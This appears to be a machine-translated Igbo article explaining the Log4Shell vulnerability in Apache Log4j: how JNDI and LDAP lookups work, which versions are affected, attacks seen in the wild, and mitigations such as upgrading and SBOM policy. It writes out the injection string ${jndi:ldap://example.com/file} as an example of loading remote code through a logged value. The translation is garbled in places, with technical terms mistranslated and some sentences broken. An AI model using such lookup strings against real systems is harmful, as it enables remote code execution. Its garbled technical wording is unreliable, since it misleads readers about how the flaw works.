Tebulu ọdịnaya[Zoo][Gosi]
N'ọgwụgwụ Nọvemba 2021, anyị ekpughere nnukwu ihe iyi egwu na cybersecurity. Ihe nrigbu a nwere ike imetụta ọtụtụ nde sistemụ kọmputa n'ụwa niile.
Nke a bụ ntụzịaka na adịghị ike Log4j yana otu mmejọ imewe nke a na-eleghara anya hapụrụ 90% nke ọrụ kọmputa ụwa mepere ọgụ.
Apache Log4j bụ ihe eji egbutu osisi sitere na Java mepere emepe nke Apache Software Foundation mebere. Nke mbụ Ceki Gülcü dere na 2001, ọ bụzi akụkụ nke Apache Logging Services, ọrụ nke Apache Software Foundation.
Ndị ụlọ ọrụ gburugburu ụwa na-eji ọbá akwụkwọ Log4j mee ka ịbanye na ngwa ha. N'ezie, ọbá akwụkwọ Java dị ebe niile, ị nwere ike ịhụ ya na ngwa sitere na Amazon, Microsoft, Google, na ndị ọzọ.
Ihe a ma ama na ọbá akwụkwọ ahụ pụtara na ntụpọ ọ bụla nwere ike ime na koodu ahụ nwere ike ịhapụ ọtụtụ nde kọmputa ka ha na-agbaba. Na Nọvemba 24, 2021, a ojii ojii onye nyocha na-arụ ọrụ Alibaba chọpụtara ajọ ntụpọ.
Ihe ọghọm Log4j, nke a makwaara dị ka Log4Shell, dị adị na-ahụghị kemgbe 2013. Ihe ọghọm ahụ kwere ka ndị na-eme ihe ọjọọ na-agba ọsọ koodu na sistemụ emetụtara na-agba ọsọ Log4j. Ewepụtara ya n'ihu ọha na Disemba 9, 2021
Ndị ọkachamara ụlọ ọrụ na-akpọ ntụpọ Log4Shell bụ nnukwu adịghị ike na ebe nchekwa na nso nso a.
N'ime izu na-esochi mbipụta nke adịghị ike ahụ, ndị otu cybersecurity achọpụtala ọtụtụ nde mwakpo. Ụfọdụ ndị nchọpụta chọpụtara ọbụna ihe karịrị otu narị mwakpo kwa nkeji.
Olee otú ọ na-arụ ọrụ?
Iji ghọta ihe kpatara Log4Shell ji dị egwu, anyị kwesịrị ịghọta ihe ọ nwere ike.
Ihe ọghọm Log4Shell na-enye ohere maka ogbugbu koodu aka ike, nke pụtara na onye na-awakpo nwere ike ịgba ọsọ iwu ma ọ bụ koodu ọ bụla na igwe ebumnuche.
Olee otú o si emezu nke a?
Nke mbụ, anyị kwesịrị ịghọta ihe JNDI bụ.
Interface aha aha na ndekọ aha Java (JNDI) bụ ọrụ Java na-enye mmemme Java ohere ịchọpụta na lelee data na akụrụngwa site na aha. Ọrụ ndekọ aha ndị a dị mkpa n'ihi na ha na-enye ndekọ ahaziri ahazi maka ndị mmepe ka ha na-atụ aka ngwa ngwa mgbe ha na-emepụta ngwa.
JNDI nwere ike iji ụkpụrụ dị iche iche iji nweta akwụkwọ ndekọ aha ụfọdụ. Otu n'ime ụkpụrụ ndị a bụ Protocol Access Directory Lightweight, ma ọ bụ LDAP.
Mgbe ị na-abanye eriri, Ndekọ 4j na-eme mgbanwe eriri mgbe ha zutere ngosipụta nke ụdị ahụ ${prefix:name}
.
Ọmụmaatụ, Text: ${java:version}
enwere ike ịbanye dị ka Ederede: Java ụdị 1.8.0_65. Ụdị ngbanwe ndị a bụ ihe a na-ahụkarị.
Anyị nwekwara ike inwe okwu dị ka Text: ${jndi:ldap://example.com/file}
nke na-eji usoro JNDI buo ihe Java site na URL site na protocol LDAP.
Nke a na-ebunye data sitere na URL ahụ nke ọma n'ime igwe. Onye ọ bụla nwere ike hacker nwere ike ịnabata koodu ọjọọ na URL ọha wee chere igwe na-eji Log4j banye ya.
Ebe ọ bụ na ọdịnaya nke ozi ndekọ nwere data onye ọrụ na-achịkwa, ndị na-agba ọsọ nwere ike itinye ntụnye aka JNDI nke ha na-arụtụ aka na sava LDAP ha na-achịkwa. Sava LDAP ndị a nwere ike juputara na ihe ọjọọ Java nke JNDI nwere ike mebie site na adịghị ike.
Ihe na-eme ka nke a ka njọ bụ na ọ dịghị mkpa ma ọ bụrụ na ngwa ahụ bụ ihe nkesa-n'akụkụ ma ọ bụ ngwa n'akụkụ ndị ahịa.
Ọ bụrụhaala na enwere ụzọ onye na-egbu osisi si agụ koodu ọjọọ onye mwakpo ahụ, ngwa ahụ ka ghere oghe maka irigbu.
Nye na-emetụta?
Ọdịmma ahụ na-emetụta sistemu na ọrụ niile na-eji APache Log4j, yana ụdị 2.0 ruo yana gụnyere 2.14.1.
Ọtụtụ ndị ọkachamara nchekwa na-adụ ọdụ na adịghị ike ahụ nwere ike imetụta ọtụtụ ngwa na-eji Java.
Achọpụtara ntụpọ ahụ nke mbụ na egwuregwu vidiyo Minecraft nke Microsoft nwere. Microsoft agbaala ndị ọrụ ha ume ka ha kwalite sọftụwia Minecraft mbipụta Java iji gbochie ihe egwu ọ bụla.
Jen Easterly, onye isi ụlọ ọrụ nchekwa cyber na nchekwa akụrụngwa (CISA) kwuru na ndị na-ere ahịa nwere ibu ọrụ iji gbochie ndị ọrụ njedebe site na ndị na-eme ihe ọjọọ na-erigbu adịghị ike a.
"Ndị na-ere ahịa kwesịkwara iso ndị ahịa ha na-ekwurịta okwu iji hụ na ndị ọrụ njedebe mara na ngwaahịa ha nwere adịghị ike a na kwesịrị ibute mmelite ngwanrọ ụzọ."
A na-ekwu na mwakpo a amalitelarị. Symantec, ụlọ ọrụ na-enye sọftụwia cybersecurity, achọpụtala arịrịọ ọgụ dị iche iche.
Nke a bụ ọmụmaatụ ụfọdụ ụdị mwakpo ndị nyocha achọpụtala:
- botnets
botnets bụ netwọk nke kọmpụta nke dị n'okpuru nchịkwa nke otu ndị na-awakpo. Ha na-enyere aka ime mwakpo DDoS, zuru data, na ojoro ndị ọzọ. Ndị nchọpụta hụrụ Muhstik botnet na edemede shei ebudatara na nrigbu Log4j.
- XMRig Miner Trojan
XMRig bụ onye na-egwuputa ihe cryptocurrency mepere emepe nke na-eji CPU na-egwupụta akara Monero. Ndị omempụ cyber nwere ike ịwụnye XMRig na ngwaọrụ ndị mmadụ ka ha nwee ike iji ike nhazi ha n'amaghị ama.
- Khonsari Ransomware
Ransomware na-ezo aka n'ụdị malware emebere ya encrypt faịlụ na kọmputa. Ndị na-awakpo ahụ nwere ike ịrịọ ka akwụ ụgwọ maka inyeghachi faịlụ ezoro ezo. Ndị nyocha chọpụtara Khonsari ransomware na mwakpo Log4Shell. Ha lekwasịrị anya na sava Windows wee jiri .NET kpuchie ya.
Gịnị na-eme na-esote?
Ndị ọkachamara na-ebu amụma na ọ nwere ike were ọnwa ma ọ bụ ikekwe ọbụna ọtụtụ afọ iji dozie ọgbaghara nke adịghị ike Log4J kpatara.
Usoro a gụnyere imelite sistemụ ọ bụla emetụtara na ụdị patched. Ọbụlagodi na akpọchiri sistemu ndị a niile, a ka nwere ihe iyi egwu na-awụ akpata oyi nke azụ azụ nke ndị hackers nwere ike tinyelarị na mpio na sava mepere emepe maka mbuso agha.
ọtụtụ ngwọta na mbelata dị iji gbochie ngwa ka mperi a na-erigbu. Ụdị Log4j ọhụrụ 2.15.0-rc1 gbanwere ntọala dị iche iche iji belata adịghị ike a.
A ga-enwe nkwarụ na atụmatụ niile na-eji JNDI na ndabara yana machibidokwa nlele anya. Ịkwụsị njirimara nchọta na ntọlite Log4j gị ga-enyere aka ibelata ihe egwu enwere ike ime.
Na mpụga Log4j, a ka nwere mkpa maka atụmatụ sara mbara iji gbochie nrigbu ndị mepere emepe.
Na mbido Mee, ndị White House wepụtara otu usoro nlekọta nke zubere imeziwanye nchekwa cyber nke mba. Ọ gụnyere ndokwa maka ụgwọ ngwanrọ software (SBOM) nke bụ n'ezie akwụkwọ nkịtị nke nwere ndepụta nke ihe ọ bụla a chọrọ iji wuo ngwa ahụ.
Nke a gụnyere akụkụ ndị dị ka Isi mmalite ngwugwu, ndabere, na API ndị ejiri maka mmepe. Ọ bụ ezie na echiche nke SBOM na-enyere aka maka nghọta, ọ ga-enyere ndị na-azụ ahịa aka n'ezie?
Nkwalite ndabere nwere ike ịbụ nnukwu nsogbu. Ụlọ ọrụ nwere ike họrọ naanị ịkwụ ụgwọ ọ bụla kama ịla n'iyi n'iyi oge ọzọ ịchọta ngwugwu ọzọ. Ikekwe ndị SBOM ndị a ga-aba uru naanị ma ọ bụrụ na ha oghere nwere oke n'ihu.
mmechi
Okwu Log4j abụghị naanị nsogbu teknụzụ maka otu.
Ndị isi azụmaahịa ga-amarịrị ihe egwu nwere ike ime mgbe sava ha, ngwaahịa ma ọ bụ ọrụ ha dabere na koodu nke ha onwe ha anaghị edobe.
Ịdabere na isi mmalite na ngwa ndị ọzọ na-abịa mgbe niile na ụfọdụ ihe egwu. Ndị ụlọ ọrụ kwesịrị ịtụle ịrụpụta usoro mbelata ihe egwu tupu egwu ọhụrụ apụta ìhè.
Ọtụtụ n'ime webụ ahụ na-adabere na ngwanrọ mepere emepe nke ọtụtụ puku ndị ọrụ afọ ofufo na-echekwa gburugburu ụwa.
Ọ bụrụ na anyị chọrọ idobe webụ ahụ ka ọ bụrụ ebe nchekwa, gọọmentị na ụlọ ọrụ kwesịrị itinye ego n'ịkwado mbọ isi mmalite na ụlọ ọrụ nchekwa cyber dị ka. CISA.
Nkume a-aza